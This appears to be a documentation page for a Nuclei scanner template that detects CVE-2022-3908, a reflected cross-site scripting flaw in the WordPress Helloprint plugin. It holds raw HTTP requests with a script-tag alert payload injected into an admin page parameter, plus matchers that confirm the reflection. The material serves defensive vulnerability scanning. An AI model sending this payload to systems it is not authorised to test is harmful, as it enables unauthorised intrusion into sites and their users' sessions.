Skip to content
Nuclei Templates

WordPress Helloprint <1.4.7 - Cross-Site Scripting

ID: CVE-2022-3908

Severity: medium

Author: theamanrawat

Tags: cve,cve2022,xss,wordpress,wp-plugin,helloprint,wp,authenticated,wpscan

Description

Section titled “Description”

WordPress Helloprint plugin before 1.4.7 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

YAML Source

Section titled “YAML Source”
id: CVE-2022-3908


info:
  name: WordPress Helloprint <1.4.7 - Cross-Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    WordPress Helloprint plugin before 1.4.7 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, potentially allowing an attacker to execute malicious scripts on the victim's browser.
  remediation: Fixed in version 1.4.7.
  reference:
    - https://wpscan.com/vulnerability/c44802a0-8cbe-4386-9523-3b6cb44c6505
    - https://wordpress.org/plugins/helloprint/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3908
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-3908
    cwe-id: CWE-79
    epss-score: 0.00119
    epss-percentile: 0.45893
    cpe: cpe:2.3:a:helloprint:helloprint:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: helloprint
    product: helloprint
    framework: wordpress
  tags: cve,cve2022,xss,wordpress,wp-plugin,helloprint,wp,authenticated,wpscan


http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=language-translate.php&success=added"><script>alert(`XSS`)<%2Fscript> HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "Translation added\\\"><script>alert(`XSS`)</script> successfully")'
        condition: and
# digest: 4a0a0047304502210092442bef0c69bb49c23442c7b154e43bbb3bb72bac095a260c0d563cee52047202201b266bdec5478321d015327003a0ca283d89f889eeafc88b8e005a7d2cd31b1c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-3908.yaml"

View on Github